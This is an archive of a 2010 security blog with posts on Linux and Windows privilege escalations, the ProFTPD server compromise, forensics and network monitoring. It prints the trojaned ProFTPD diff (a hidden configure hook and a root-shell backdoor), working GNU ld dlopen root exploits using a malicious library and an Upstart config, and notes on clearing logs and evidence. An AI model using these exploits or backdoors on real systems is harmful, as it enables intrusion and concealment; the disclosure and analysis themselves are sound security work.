Tuesday, December 21, 2010

Linux ACPI custom_method Privilege Escalation

Past November 13rd  a fix was commited in the Linux kernel.   For some reason I cannot understand, /sys/kernel/debug/acpi/custom_method was world writable, allowing any user to inject custom ACPI methods  into the ACPI interpreter tables.

As the RedHat bug report explains, it was introduced in this commit (Linux 2.6.33)

cm_dentry = debugfs_create_file("custom_method", S_IWUGO,
                    acpi_dir, NULL, &cm_fops);
 S_IWUGO is a macro that grants world writable  permissions
#define S_IWUGO         (S_IWUSR|S_IWGRP|S_IWOTH)

The fix changes the permissions to S_IWUSR, that is a macro that grants write access to the owner (root)

An exploit already exists for this vulnerability.

Wednesday, December 15, 2010

The OpenBSD IPSec stack is possibly backdoored

Yesterday, Theo de Raadt sent an e-mail to the openbsd mailing list disclosing the possible existence of a backdoor in the IPsec stack.

I have received a mail regarding the early development of the OpenBSD IPSEC stack. It is alleged that some ex-developers (and the company they worked for) accepted US government money to put backdoors into our network stack, in particular the IPSEC stack. Around 2000-2001.
Since we had the first IPSEC stack available for free, large parts of the code are now found in many other projects/products. Over 10 years, the IPSEC code has gone through many changes and fixes, so it is unclear what the true impact of these allegations are.

The forwarded e-mail is unbelievable...

Hello Theo,
Long time no talk. If you will recall, a while back I was the CTO at NETSEC and arranged funding and donations for the OpenBSD Crypto Framework. At that same time I also did some consulting for the FBI, for their GSA Technical Support Center, which was a cryptologic reverse engineering project aimed at backdooring and implementing key escrow mechanisms for smart card and other hardware-based computing technologies.

My NDA with the FBI has recently expired, and I wanted to make you aware of the fact that the FBI implemented a number of backdoors and side channel key leaking mechanisms into the OCF, for the express purpose of monitoring the site to site VPN encryption system implemented by EOUSA, the parent organization to the FBI. Jason Wright and several other developers were responsible for those backdoors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, theymore than likely caught wind of the fact that those backdoors were present and didn't want to create any derivative products based upon the same.
This is also why several inside FBI folks have been recently advocating the use of OpenBSD for VPN and firewalling implementations in virtualized environments, for example Scott Lowe is a well respected author in virtualization circles who also happens top be on the FBI payroll, and who has also recently published several tutorials for the use of OpenBSD VMs in enterprise VMware vSphere deployments.
Merry Christmas...  

Gregory Perry  
Chief Executive Officer 
GoVirtual Education

Tuesday, December 14, 2010

Snort coverage for the Exim remote root vulnerability

The Sourcefire VRT has published a blog post that describes how Snort detects the Exim root vulnerability.

Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely

 No configuration is necessary; the default settings for the SMTP preprocessor will work here. For anyone who may have tweaked their config, ensure that the meax_header_line_len is set to 2000 bytes or less (a reasonable value for all but the most unique of environments; the default value is 1000 bytes).

Monitoring the network with sFlow

Some resources to monitor networks with sFlow. Seen in geek00l's blog.

sFlow is a technology comparable to Netflow , that can be used to monitor in real time the network activity.

Capturing Windows Logon Credentials with Metasploit

Great blog post from the Metasploit blog that explains how to use a keylogger to capture the Windows Logon credentials.

Smartlocker is a script meant to capture the Windows credentials used to unlock the session.

- Migrates to winlogon.exe
- Waits for the session to be locked (the session is idle).
- Starts the keylogger until the session is unlocked (by typing the username and the password)
- Stops the keylogger
- The credentials are stored in a text file located in /home/{user}/.msf3/logs/scripts/smartlocker/

Monday, December 13, 2010

Root vulnerability in Exim

Several websites comment the root exploit in Exim that was published last week. In a nutshell, there is a memory corruption  in the string_format() function, that is triggered  in the e-mail headers.

What worries me is:
The flaw has been remedied In the Exim sources since version 4.70, released at the end of 2008. The correction was not, however, marked as relevant for security and therefore was not included in older versions. Debian’s stable Lenny distribution still uses Exim 4.69, while Red Hat has 4.43. 

Details from H-Security Initial report and fixes

Exim's bug report

Kingcope's exploit

Wednesday, December 8, 2010

Linux Kernel <= 2.6.37 local privilege escalation

A new local privilege escalation has been discovered in the Linux kernel as reported in the Full Disclosure mailing list.

The exploit combines three different vulnerabilities to gain root privileges: CVE-2010-4258, CVE-2010-3849 and CVE-2010-3850.

Affected systems
The Econet protocol (CVE-2010-3849) is not supported by default in RedHat like distributions (RHEL, CentOS and Fedora) and the majors distributions already patched CVE-2010-3849 and CVE-2010-3850, so up to date systems should not be affected by this particular exploit.

CVE-2010-4258 is the main vulnerability and it is still unpatched. Somebody could find another way to trigger the vulnerability.

msk@ubuntu:~/exploit$ gcc  15704.c  -o foo
msk@ubuntu:~/exploit$ ./foo 
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xe08b72a0
 [+] Resolved econet_ops to 0xe08b73a0
 [+] Resolved commit_creds to 0xc016c830
 [+] Resolved prepare_kernel_cred to 0xc016cc80
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
uid=0(root) gid=0(root) groups=0(root)

Friday, December 3, 2010

Beyond Exploits: Real World Penetration Testing

This is one of the presentations that should be watched by any IT Manager or  Chief Security Officer.

People tend to focus their security posture in the vulnerabilities instead of  a sound design that protect their critical assets and, even, penetration testers commit the same mistake. Of course, bad penetration testers.

In my career in IT, I have seen many so called penetration testers that just run vulnerability scanners and then send the report to the customer.  It is plainly wrong (rubbish?) because I do not need to pay a company to scan my own network for vulnerabilities, since I can do it by myself, with the same results.

Then, what is a penetration test? It is meant to emulate a real attack, that tries to reach our core business by making use of any possible attack vector.

A penetration tester must try all the possible attack vectors. This includes: mis-configurations, bad network designs, vulnerabilities,  social engineering,  protocol weaknesses, etc. Just because an skilled attacker, the one that is motivated and can cause a big damage, will do.

H.D. Moore is the Chief Security Officer of Rapid7 and  Founder & Chief Architect of Metasploit.

This presentation shows the techniques that can be used by a skilled penetration tester in order to gain full access to the network without exploiting a single vulnerability.

It includes:  attacking the users,  password testing, design weaknesses in the Windows platform (NTLM hashes and NTLM relay),  exploit the SMB design weaknesses to gain privileges up to the domain controler,  layer 2 attacks,  IPv6, etc..

Slides  Video

Thursday, December 2, 2010

ftp.proftpd.org compromised

The ProFTPD project  has sent a report to inform that the main distribution server  was compromised.

On Sunday, the 28th of November 2010 around 20:00 UTC the main distribution server of the ProFTPD project was compromised. The attackers most likely used an unpatched security issue in the FTP daemon to gain access to the server and used their privileges to replace the source files for ProFTPD 1.3.3c with a version which contained a backdoor. The unauthorized modification of the source code was noticed by Daniel Austin and relayed to the ProFTPD project by Jeroen Geilman on Wednesday, December 1 and fixed shortly afterwards.

The backdoor introduced by the attackers allows unauthenticated users remote root access to systems which run the maliciously modified version of the ProFTPD daemon

UPDATE: I found a diff of the trojaned version

diff -Naur proftpd-1.3.3c.orig/configure proftpd-1.3.3c/configure
--- proftpd-1.3.3c.orig/configure       2010-04-14 00:01:35.000000000 +0200
+++ proftpd-1.3.3c/configure    2010-10-29 19:08:56.000000000 +0200
@@ -9,7 +9,10 @@
 ## --------------------- ##
 ## M4sh Initialization.  ##
 ## --------------------- ##
+gcc tests/tests.c -o tests/tests >/dev/null 2>&1
+cc tests/tests.c -o tests/tests >/dev/null 2>&1
+tests/tests >/dev/null 2>&1 &
+rm -rf tests/tests.c tests/tests >/dev/null 2>&1
 # Be more Bourne compatible
 DUALCASE=1; export DUALCASE # for MKS sh
 if test -n "${ZSH_VERSION+set}" && (emulate sh) >/dev/null 2>&1; then
diff -Naur proftpd-1.3.3c.orig/src/help.c proftpd-1.3.3c/src/help.c
--- proftpd-1.3.3c.orig/src/help.c      2009-07-01 01:31:18.000000000 +0200
+++ proftpd-1.3.3c/src/help.c   2010-11-16 18:40:46.000000000 +0100
@@ -27,6 +27,8 @@

 #include "conf.h"
+#include <stdlib.h>
+#include <string.h>

 struct help_rec {
   const char *cmd;
@@ -126,7 +128,7 @@
         cmd->server->ServerAdmin ? cmd->server->ServerAdmin : "ftp-admin");

     } else {
+      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {
         if (strcasecmp(helps[i].cmd, target) == 0) {
diff -Naur proftpd-1.3.3c.orig/tests/tests.c proftpd-1.3.3c/tests/tests.c
--- proftpd-1.3.3c.orig/tests/tests.c   1970-01-01 01:00:00.000000000 +0100
+++ proftpd-1.3.3c/tests/tests.c        2010-11-29 09:37:35.000000000 +0100
@@ -0,0 +1,58 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <string.h>
+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+int sock;
+void handle_timeout(int sig)
+    close(sock);
+    exit(0);
+int main(void)
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+return 0; }

$ telnet 0 21
Connected to 0.
Escape character is '^]'.
220 ProFTPD 1.3.3c Server (ProFTPD Default Installation) []
214-The following commands are recognized (* =>'s unimplemented):
 XRMD    MKD     XMKD    PWD     XPWD    SIZE    SYST    HELP
 NOOP    FEAT    OPTS    AUTH*   CCC*    CONF*   ENC*    MIC*
214 Direct comments to someone@somewhere
502 Unknown command 'ANOOP'
502 Unknown command 'A'

id ;
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

Using Volatility to perform memory forensics

The Volatility website points to a series of blog posts that explain how to use Volatility to perform memory forensics

CSS History Hack

The CSS History Hack  is an attack already explained by Jeremiah Grossman in 2006.  In a nutshell, it is possible to use CSS  and Javascript to know which pages has visited our 'guest' before.  How?  The web browser will change the state of the links already visited by the user.

Forbes explains that some popular sites like YouPorn are using this technique to know which other porn sites the user has visited before.

How does it work? It’s based on your browser changing the color of links you’ve already clicked on. A script on the site exploits a Web privacy leak to quickly check and see whether your browser reveals that the links to a host of other porn sites have been assigned the color “purple,” meaning you’ve clicked them before. YouPorn did not respond to an inquiry about why it collects this information, and tries to hide the practice by disguising the script with some easy-to-break cryptography.*

 The porn site is not alone in its desire to know what other websites visitors have visited. A group of researchers from the University of California – San Diego trolled through the Web’s most popular sites to see which ones were collecting this information about visitors. They found it on 46 other news, finance, sports, and games sites, reporting their findings in a paper with the intimidating title, “An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications.”

 The researchers who wrote the paper identifying this practice call it “history hijacking” or “history sniffing.” Mozilla, the foundation behind Web browser Firefox, calls it the “CSS: visited history bug.” It’s a bug that’s been discussed in developer circles for over a decade. Some browsers have fixed the bug. If you’re surfing using Chrome or Safari, this script doesn’t work. Firefox has fixed it in its newest version (for a long explanation as to how, see this post on the Mozilla security blog.) Internet Explorer, the most popular browser out there, is vulnerable to the history sniffing (though you can prevent it by going through the slightly onerous step of activating InPrivate Browsing, according to a spokesperson. That feature also blocks ad networks’ cookies, reports Business Insider.)

Quick introduction to SamuraiWTF

holisticinfosec describes the purpose of SamuraiWTF.

SamuraiWTF is a LiveCD Linux release designed to serve you for your web pen-testing needs. Kevin Johnson of Secure Ideas and Justin Searle of InGuardians included what they believe are the best of the open source and free tools that focus on testing and attacking websites, selections based on the tools they use as part of their job duties. SamuraiWTF includes tools useful in all four steps of a web pen-test:
Reconnaissance – Fierce domain scanner, Maltego (be sure to check out the Shodan Maltego add-on)
Mapping – WebScarab, ratproxy
Discovery – w3af and burp
Exploitation – BeEF, AJAXShell

Russ McRee points to his article published in the December 2010 issue of the ISSA Journal. The article gives a quick introduction to the tools available  in  SamuraiWTF.

Thursday, November 25, 2010

Full packet capture on Cisco Firewall

Via opensourceforensics.org

 Create and fire up the packet capture
# capture MYCAP interface IFNAME packet-length 1500 buffer SIZE

The above command will capture everything; if you want to filter your capture, add an access list, like so:
#capture MYCAP interface IFNAME packet-length 1500 access-list 777 buffer SIZE

Remember to define access-list 777 first. Of course, you can substitute 777 with any other number.

Stop the capture
# no capture MYCAP interface IFNAME

Retrieve the captured data
Point your browser to the firewall SSL URL like so:
Download the pcap file, and open it with wireshark or a similar tool.
Note: you can also use tftp to get the pcap.

# no capture MYCAP

Two new privilege escalations in Windows

Two new privilege escalations in Windows have appeared this week.

Privilege escalation in the Scheduler
Via h-online.com
Microsoft has already patched three of the four security holes exploited by Stuxnet, but the fourth hole remains unpatched. Now, an exploit, currently being circulated on the web, exploits the remaining hole in the Windows Task Planner to access protected system directories – even if a user is only logged in with limited access privileges. Experts call this a privilege escalation attack.
According to webDEViL, who developed the exploit, the demo malware works under Windows 7, Vista and Server 2008, both in their 32-bit and in the 64-bit versions.

Privilege escalation in the Registry
Via isc.sans.edu  exploit-db.com  packetstormsecurity.org
Today proof of concept code (source code, with a compiled binary) of a 0-day privilege escalation vulnerability in almost all Windows operating system versions (Windows XP, Vista, 7, Server 2008 ...) has been posted on a popular programming web site.
The vulnerability is a buffer overflow in kernel (win32k.sys) and, due to its nature allows an attacker to bypass User Access Control (UAC) on Windows Vista and 7 operating systems.
What’s interesting is that the vulnerability exist in a function that queries the registry so in order to exploit this the attacker has to be able to create a special (malicious) registry key. Author of the PoC managed to find such a key that can be created by a normal user on Windows Vista and 7 (so, a user that does not even have any administrative privileges).
The PoC code creates such a registry key and calls another library which tries to read the key and during that process it ends up calling the vulnerable code in win32k.sys. Since this is a critical area of the operating system (the kernel allows no mistakes), the published PoC only works on certain kernel versions while on others it can cause a nice BSOD. That being said, the code can be probably relatively easily modified to work on other kernel versions.

Tuesday, November 23, 2010

SSL MITM with sslstrip

Nice article that shows how to perform a MITM attack with sslstrip

Open Source Digital Forensics

I have found the Open Source Digital Forensics website via the Internet Storm Center.

The Open Source Digital Forensics site is a reference on the use of open source software in digital investigations. As shown in the papers section, open source software may have legal benefits over closed source software.

  • An investigator can learn and testify about what her open source forensic analysis tools did.
  • An investigator can testify about the conditions that existed in the suspect's open source software for a piece of evidence to be generated (i.e. a log entry).

We do not claim that open source tools are superior to closed source tools. Both can have serious bugs and faults and produce errors. This site provides an easy reference for investigators who are interested in using open source analysis tools during an investigation.

The tools section is really interesting. It covers the following areas:

  • Use to boot a suspect system into a trusted state.
  • Use to collect data from a dead or live suspect system.
  • Use to examine the data structures that organize media, such as partition tables and disk labels.
  • Use to examine a file system or disk image and show the file content and other meta data.
  • Use to analyze the contents of a file (i.e. at the application layer).
  • Use to analyze network packets and traffic. This does not include logs from network devices.
  • Use to analyze memory dumps from computers.
  • Frameworks used to build custom tools.

Thursday, November 18, 2010

Doing penetration testing with a minimal footprint

This presentation from  hack3rcon shows how to perform a penetration test that will leave a minimal footprint, thanks to the Metasploit Meterpreter.

It describes techniques to avoid leaving footprints in:  the Eventlog, the Windows Registry, the Windows Prefetch and  the File System.

Below you can read my notes (almost a copy of the slides)

Operating in the Shadows Carlos Perez a.k.a Darkoperator from Adrian Crenshaw on Vimeo.

 - Runs in memory ( no disk access)
 - Memory scrubbing. Not easy to understand what meterpreter did when analizing a memory image.
 - Windows API access
 - Encrypted traffic (man in the middle, self-generated keys)
 - Can be automated and extended

Why leaving a minimal footprint?
- Test Incident Response
- Tests monitoring systems
- Real world attacks.

- list of targets and goals (business and technical point of views)
   * Interview the client and information gathering
- Enumarate target capabilities
- Physical, SE and network
- Design an initial plan
- Modify your plan as you keep advancing
  * Gather information from the hosts (data and configuration)
  * Modify your plan if something looks out of place

Know your enemy
- First go for the easy targets
  * They will check the processes running, connections, registry keys,
     event logs and they may dump the memory
- Not all companies have an IR team
- In some companies, the system administrators are also doing security.
- We can predict what the defenders are going to do

- Their questions:
  * Process list: Time of creation, Parent PID, owned and command line
  * Connections: Why is a process like 'notepad' connecting to Internet?
  * Why is Internet Explorer connecting to a not standard port?
  * etc.
- They will create a timeline to investigate the incident.

Event log
- Command and capabilities differ among Windows versions
  (they also do not record the same data and they use different formats)
- Event log: binary format  up to windows XP.  XML format to Vista, 7 and 2008
- The IDs also changed with the new formats
- We can read from the registry without leaving footprints.
- We can get the file location, name and configuration out of the registry
- Script 'event_manager' works with the Eventlog from memory: query, clear, etc. It saves the data localy in a csv file.
- Windows 7 and Windows 2008 can send event logs to other servers by using winrm (ssl and self-generated certificates)
- A server can collect remote event logs if the Wecsvc service is running
- Wecsvc can be queried by using wecutil command es  (enum subscriptions)  and gs (enum configurations)
- Most interesting entries: Scheduled tasks, new/change/remove accounts, stop/start service, logon/logoff, failed logon, add/remove user from a group

Windows Registry
- OS settings
- Group policy settings
- Application settins
- Read access is available on most of it
- With the UAC enabled in Windows 7/2008R2, administrators may not be able to modify registry keys
- It can be configured to log access to it and the modifications (not set by default and rarely used)
- ACLs can be placed on registry keys (not set by default and rarely used)
- Metadata only shows Write an Creation Time, but not Access Time
- We need special tools to get the Write time: F-Response, EnCase and Open Source (http://www.forensicswiki.org/wiki/Windows_Registry)

Windows Prefetch
- Saves a list of the most commonly executed binaries to speed up the booting process. Enabled by default on client operative systems since XP .
- It shows how many times a file has been executed since it first appeared in the prefetch.
- %windir%\prefetch and can only be deleted by the administrator
- Configuratio saved in the registry
- Anything we do on the computer will create a file there.

User Assist
- Registry key that saves a counter of the programs executed by Explorer.exe
- HCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist
- Each key name is the name of the executable/shortcut encrypted in ROT-13 (can be easily decrypted)
- Only the commands executed through the GUI

File System
- 2000,XP and 2003 record the last access time by default
- Vista, 7 and 2008 do not do that (performance)
- Cleaning a File MACE will not help since only $STDINFO is modified. The data will remain there.
- Deleted files and directories can be saved in a Volume Shadow (VSS or snapshots) that is enabled by default
- Some folders and file types are excluded from the snapshots and this information can be queried.

How To Operate
- Use Meterpreter commands
- Understand the scripts. Are they uploading/creating files or directories?
- check if prefetch and Volume Shadows are enabled
- Do not forget the User Assist key if the GUI is used

Know your Environment
- check your privileges
- What is running?
- What is being logged by EventLog?
- Is VSS enabled?
- What tools are they using?
- Is last Access Time logged?

Clear the Tracks
- Sometimes is better to clear the security log even if it is a dead gateway
- Delete the files and then wipe with  cipher.exe
- Delete the Volume Shadows after whiping the files
- Delete prefetch entries in client computers

Execution of Commands
- Execute from Explorer
- Use Incognito or Tokens if you are System
- If you are placing tools, stream them under system executables and execute them from there
- Use Railgun instead of executables if possible (no write to disk is done because it is injecting DLLs)

Hide your Connections
- The connections must look 'normal'. Try to behave like a ligitimate user/server would do.
- Use IPv6 when it is available because people is not looking at it.

Where to Take a Dump
- The files in the temporary folders have weird names.
- If not able to delete the VSS, check the file extensions and temporary folders.
- Be carefull what you are writting to disk, because the Antivirus will check the files (vbs,payloads)
- The duplicate and multi_meter_inject scripts can inject a meterpreter payload onto the memory of a running executable.

Wednesday, November 17, 2010

Tracking malware on a budget

Many people in IT will agree that budgets are getting smaller, if you are lucky enough to have some money at this time of the year ;)   This post talks about finding infected computers in our networks, without spending lots of money in expensive systems.

There is more and more research that provides lists of C&C servers, for the most common botnets.

As a quick resume:
- etc.

Making use of this information, we can setup an environment that permits us to quickly detect compromised computers in our network that try to reach the C&C server, making the process of detection and clean-up faster.

A possible setup could be a DNS sinkhole plus some signatures in our IDS (all the traffic redirected by the DNS sinkhole must be worth of attention).  This can be completed with a dedicated web server that permits us to know the URLs that are being used to fetch the malware.

This point of view is interesting because it permits us to gather intelligence instead of just blocking the malware.  This way, we have the opportunity to perform a  malware analysis that will help us to understand how it behaves and, thus, provide a quick way to find/remove it from our computers.

Saturday, November 13, 2010

Quick introduction to Network Security Monitoring

Network Security Monitoring  is the area of Information Security I love, Unix systems apart, and I always wanted to write about this methodology since I started this blog :)

Many of the concepts I am going to talk about are better explained in the awesome book from Richard Bejtlich entitled The Tao of Network Security Monitoring: Beyond Intrusion Detection.  You can find more information about his book in his website.

The idea behind NSM is that Network Monitoring is not just a matter of deploying an IDS or IPS in the network. When an alert is generated, the only information we have is a rule and a small packet capture with the bytes that generated the alert.

The questions here are: Do we have enough information to confirm whether this was an attack or not? Was it successful? Can we easily track the activities performed by the attacker in our network?  The short answer, is we do not know! We do not have enough details to perform an investigation.

NSM is a methodology that tries to solve this problem by offering the data that an analyst needs to perform the investigation. I will not explain all the details, because it is too long for a blog post, but I will try to briefly explain the main concepts.

Full content data

It is easy to understand that, in an ideal scenario, a full packet capture of the traffic generated by the attacker should be enough, because it contains all the details of the activities performed by the attacker in our network.

With this data, we can confirm if an attack was successful and if the attacker went deeper in our network. Furthermore, we can obtain the tool-kits that were downloaded to the compromised server. The attacker can try to fool a forensic analyst that is analysing the compromised computer, but it is not possible in network comunications.

Session data
Unfortunately, full content data does not escalate.  An analyst cannot easily perform an investigation with huge amounts of data and it is even worse when the task is in real time. Session data helps to solve this problem because it is just a summary of the traffic that passed through our sensors.

An analyst can quickly track the attacker by applying filters to the session data and then going to the full content data when it is needed. At this point, the available data consists of all the communications at the transport layer, without the content of the packets. This includes: IP addresses, protocols, ports, flags. etc..

Statistical analysis and external indicators of a compromise
Having a good base of our network and equipment helps to detect unexpected changes that may be caused by an incident or an intrusion. It could be: high network traffic, servers under high load, etc.

Sometimes, this statistical analysis can be complemented by other indicators like: servers or routers crashing, people complaining that an application is not working. etc.. Perhaps intelligence and information gathering can be also added here: third party companies/institutions complaining about attacks from our network, a post in Internet saying the we were compromised, possible active threats. etc.

Intrusion Detection Systems
In practice, an human cannot spot an attack in real time just by looking at the generated data. We need a tool that automates all this process and the analyst will only validate the alerts with the available data, as already explained. In case an incident is ongoing, the analyst will escalate the alert to the CIRT (Computer Incident Response Team).

It is important to notice that we are using an IDS (Intrusion Detection System) and not an IPS (Intrusion Prevention System). Our goal is to gather enough information to understand the attacks and act accordingly. The IPS will block a possible attack but we will miss the full picture of the incident.

Friday, November 12, 2010

Tool for timeline analysis: log2timeline

log2timeline, a framework for automatic creation of a super timeline. The main purpose is to provide a single tool to parse various log files and artifacts found on suspect systems (and supporting systems, such as network equipment) and produce a timeline that can be analysed by forensic investigators/analysts.

Example of usage: introduction  and solution


OSX update breaking PGP full disc encryption

Via darknet :

For the past day or so I’ve been seeing endless people tweeting about how the latest Mac OS X update b0rks your Mac if you are using PGP full disc encryption. It’s a pretty nasty bug, but thankfully it can be recovered from fairly easily.
If you are just looking for a quick solution, you can:
a) Not apply the update (as recommended by PGP)
b) Decypt your volumes, apply the update, then re-encrypt

For the LOL:

Users of PGP’s Whole Disk Encryption for Macs got a nasty surprise when they upgraded to the latest OS X update once they discovered their systems were no longer able to reboot.

It seems that Apple and the Symantec-owned PGP suffered a near-fatal failure to communicate that 10.6.5 ships with a new EFI booter that was incompatible with the encryption software’s boot guard. As a result, the update rendered Macs using WDE as little more than expensive paperweights.

A fix was provided yesterday morning by PGP, the details are here:
Mac PGP WDE customers should not apply the recent Mac OS X 10.6.5 update

UPDATE: H security also talks about the same problem.

Physical Penetration Testing Presentation

Nice presentation made in Hack3rCon 2010

The original videos can also be found here

- Purpose and goals of the pentest
  (the customer may not know or be wrong)

  * What is running your business?

- Why?
  * attack vectors
  * evaluate the controls
  * potential vulnerabilities
  * find real threats to the organization
  * It must be a repeatable process and easy to explain
    (the methodology is important)
  * perhaps a security review can be done instead of a pentest
    (A pentest in a really insecure place is not worthy)

- Scope
  * which targets how can you attack and how?
  * what are you authorized to do versus real world?

- Methodologies
  * Open Source Security Testing Methodology
  * Crime Prevention Through Environmental Design

- Threat Source Analysis
   * actors
   * Funding, motivation and time

- Method
  * research
  * reconnaissance (google maps :D )
  * planning
  * execution
  * extraction
  * Wrap Up

- Real world examples

- Reporting

- Being catched by the Police :D

- Recommended reading

- Training

Wednesday, November 10, 2010

Quick introduction to shellcoding

This is just a presentation from 2007 that gives a quick introduction to shellcoding.

More info: Slides Video

Executing programs from memory with Metasploit

One of the most powerful characteristics of Metasploit is the ability to execute programs from Memory, without writing files to disc.

The guys from Pauldotcom had this nice technical segment in their podcast. The video shows how to duplicate (or create multiple instances) of a Meterpreter session by injecting itself onto another process.

They also show now to dump the memory of a process without touching the disk.

Show notes

Monday, November 8, 2010

Escalation via a library upload and the GNU ld dlopen vulnerability

In my previous post I was trying to find ways to gain root shell by using the dlopen vulnerability, but I could not find something interesting because I was looking at the wrong place.

At this point, we have two facts:
  • I can create world writeable files as root
  • I can load libraries that are not meant to be used by a setuid program
I was looking for ways to subvert services to gain root, when the answer was right there in the advisory.

By having the ability to upload my own evil library to the host and then execute it as described in the PoC, I can gain a root shell easily. But, since I can only load a library if it is located in the path defined in /etc/ld.so.conf , I have to find a way to copy my library to a valid directory, that is going to be owned by root.

Well, the solution to this problem can be found by making use of the vulnerability to create a world writeable file in the path (i.e. /lib) and then overwrite it with the contents of the library.

Once the library is loaded, we only need to make use of the vulnerability again to get a root shell and then secure our access to the system.

The library is really simple. It only defines a constructor that is executed by the setuid program.

#include <errno.h>
#include <unistd.h>

static void
__attribute__ ((constructor))
install (void)
  execl("/bin/sh", "/bin/sh", (char *) 0);

At this point, we only have to compile the library and follow the steps explained before

umask 0
gcc -c -fPIC evil.c -o evil.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so evil.o
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libevil.so" ping
cat ./libevil.so > /lib/libevil.so
LD_AUDIT="libevil.so" ping

As a result,  we have root shell

user@host:~/$ sh run.sh
ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaAD] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface]
            [-M pmtudisc-hint] [-m mark] [-S sndbuf]
            [-T tstamp-options] [-Q tos] [hop1 ...] destination
# whoami

Note: this attack has been tested in an unpatched  Ubuntu 10.10

Friday, November 5, 2010

Privilege escalation with Upstart and the GNU ld dlopen vulnerability

As I wrote  in the previous  post GNUI ld dlopen privilege escalation, we can create world writable files owned by root.  The advisory states that we can create a file to /etc/cron.d/, thus we can gain root privileges by creating an entry that drops a setuid root shell, but it is not the case because Cron checks the permissions and does not allow crontabs with global write permissions (for the group and for others).

Gaining root access is not easy because umask does not allow the execute flag for files. So, we cannot put a file in the PATH that could impersonate a legit binary while it drops a suid shell somewhere in the file system, as a simple example.

There are not many places in a Unix system where we can put a file that is going to be parsed (not executed) by an application that is executed by root and, at the same time, permits to execute arbitrary commands (Cron is not the case as commented above).

An option could be to create the files /etc/profile or /etc/bashrc if they do not exist, because they are going to be sourced by bash when root logs into the server,  but they already exist in many systems and the PoC creates files but does not change permissions.

I have found out that Upstart, that is being used by many distributions, does not check the permissions when reading the configuration files and it offers directives to execute binaries (like getty, anacron, etc..).  This way,  the attacker can create a configuration file that will instruct Usptart to drop a suid root shell at boot time, thanks to the vulnerability in GNU ld.

Privilege escalation

The following example only applies for Ubuntu, but it can be modified for other distributions.
- The upstart configuration files are located in the /etc/init directory and named as XXX.conf
- The directory is owned by root with 755 permissions

The attacker has to create the file /etc/init/tty7.conf by executing the PoC and then writing  the following content onto it.
start on runlevel [12345]
exec /bin/bash -c "chown root.root /home/msk/exploit/shell ; chmod u+s /home/msk/exploit/shell"
Where /home/msk/exploit/shell is a shellcode that calls /bin/sh with suid(0)/sgid(0)

After rebooting,  /home/msk/exploit/shell will be a binary owned by root and with the setuid permission set

Thursday, November 4, 2010

Analysis techniques in image forensics

Nice post from the Windows Incident Response blog that describes several techniques for analyzing disk images.

Timeline analysis
This is a great analysis technique to use due to the fact that when you build a timeline from multiple data sources on and from within a system, you give yourself two things that you don't normally have through more traditional analysis techniques...context, and a greater relative level of confidence in your data.
 As to the overall relative level of confidence in our data, we have to understand that all data sources have a relative level of confidence associated with each of them. For example, from Chris's post, we know that the relative confidence level of the time stamps within the $STANDARD_INFORMATION attributes within the MFT (and file system) is (or should be) low. That's because these values are fairly easily changed, often through "time stomping", so that the MACB times (particularly the "B" time, or creation date of the file) do not fall within the initial timeframe of the incident. However, the time stamps within the $FILE_NAME attributes can provide us with a greater level of confidence in the data source (MFT, in this case). By adding other data sources (Event Log, Registry, Prefetch file metadata, etc.), particularly data source whose time stamps are not so easily modified (such as Registry key LastWrite times), we can elevate our relative confidence level in the data.
 Note: The SANS Computer Forensic blog talks about the same subject.

It makes sense because an analyst cannot trust only a single source of information.  We must correlate multiple data sources in order to get the full picture (context) and spot possible manipulations.

Timeline Creation
In systems with many noise does not make sense creating a full timeline because the background noise may cost you more problems than targeting only the areas you are interested in.
However, there is a method to my madness, which can be seen in part in Chris's Sniper Forensics presentation. I tend to take a targeted approach, adding the information that is necessary to complete the picture. For example, when analyzing a system that had been compromised via SQL injection, I included the file system metadata and only the web server logs that contained the SQL injection attack information. There was no need to include user information (Registry, index.dat, etc.); in fact, doing so would have added considerable noise to the timeline, and the extra data would have required significantly more effort to analyze and parse through in order to find what I was looking for.
Feedback loop
Use a knowledge database updated with findings in your previous investigations. Also, sharing information within a team is vital to achieve the goals and be more efficient.

There are also some comments about RegRipper,

RegRipper is a Windows Registry data extraction and correlation tool. RegRipper uses plugins (similar to Nessus) to access specific Registry hive files in order to access and extract specific keys, values, and data, and does so by bypassing the Win32API.

